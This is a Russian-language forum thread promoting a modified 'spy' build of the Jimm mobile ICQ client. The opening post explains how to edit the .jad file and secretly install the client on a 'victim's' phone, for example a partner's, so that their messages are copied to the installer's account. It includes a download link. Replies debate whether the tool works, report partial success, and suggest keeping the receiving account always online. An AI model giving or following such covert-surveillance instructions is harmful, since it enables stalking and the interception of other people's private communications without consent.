Хага, Вы думали это невозможно!? Так нет возможно Эта шпионская версия jimm, через каторую мона читать чюжую пириписку, например своей любимой. Итак установка такова: Открываем .jad блокнотом ищем там 575896240. Нам надо отнять от 575896240-ваш уин= точто палучится вписываем вместо 575896240, сохраняем .jad , и устанавливаем приложение через jad который вы правили(рядом с .jad должен находиться .jar). Тока устанавливаем не сибе а вашей жертве у каторой хотите читать историю. Посли того как жертва зайдёт в онлине через эту асю все сообщение которые она будет писать камута будут приходить и каму пишет и вам... Данный клиент я тестировал 3 месяца назад, такчто строго несудить. Прошу всех отписываться. Качаем тут: www.forum-mp3.org\jimm.rar Тема опсуждения ТУТ!
Честно говоря, сильно сомневаюсь. Но если это так, то выходит что все сообщения, которые кто-либо кому-либо шлёт в джиме, приходят на уин 575896240? Или это означает нулевой уин (раз нужно отнимать свой уин?). Я, конечно, не силён в устройстве Icq-сети, но, насколько я помню, нулевой уин используется в системных целях. Может быть, сообщения даже доходить до адресата не будут после этого у реципиента =) Да и я на месте разработчиков джима не стал хранить важную инфу в яде...
Нечего падобного! Писал это нея ! Взял я это с motofan.ru от 575896240 отнимаем ваш уин и то что палучаеться пишем в место 575896240... сёня пастараюсь отыскать темы на motofan.ru .Как найду дам сылку. Возьмите да проверти на какойнебуть кревой девятке
Вот тут темма где опсуждаеться этот клиент! _http://forum.motofan.ru/index.php?showtopic=74481&hl= Прошу модеров почистеть тему!!!
я пока что не тестил, но jad файл в принципе не может этого делать, он нужен только для скачивания приложения через wap, а может это типа конфиг для джима который крадёт аськи..
Каким образом чужая история появится у меня? Она сохраняется ТОЛЬКО в rms памяти java-приложения, где установлен jimm! Если бы она пересылалась куда-то еще на сервер, это заметили бы по увеличению количества траффика. //////////// Я понял в чем дело. Этот джимм при установке получает номер, на который нужно кидать мессаги. И если кто-то заходит через этот джимм на свою асю, сообщения, которые он отправляет и получает приходят на номер, данный при установке в jad файле.
Ты на тему опсуждения заходил??? Там проктически все написали что работает, и уменя он в том числе работал...
Уууууууу.... е мое..... версия может и шпионская, но с некоторыми странными особенностями =), лично я не верю
Только что попробывал... вроде бы все работает, но не все месаги приходят шпиону, но это фсе фигня, а так очень даже не чего не ожидал)
Зависит, почемуто он нехочет отсылать мисаги на офффф номер, такчто надо чтобы вы были в сети тода вам придут месаги.... Люди про + незабываем!
Ну раз зависит,то можно номер всегда в сети держать. Например с помощью сервиса AIM Always On. здесь подробнее:http://asechka.ru/archive/?id=2110
уже давно непомню на каком форуме видел эту тему, именно про этот джимм, там тож все сомневалсиь по поводу работоспособности, сам не пробовал, х.з. что он шпионит, может не мессаги а пасы ( Ro$k-0 эти AIM сервера уже неработают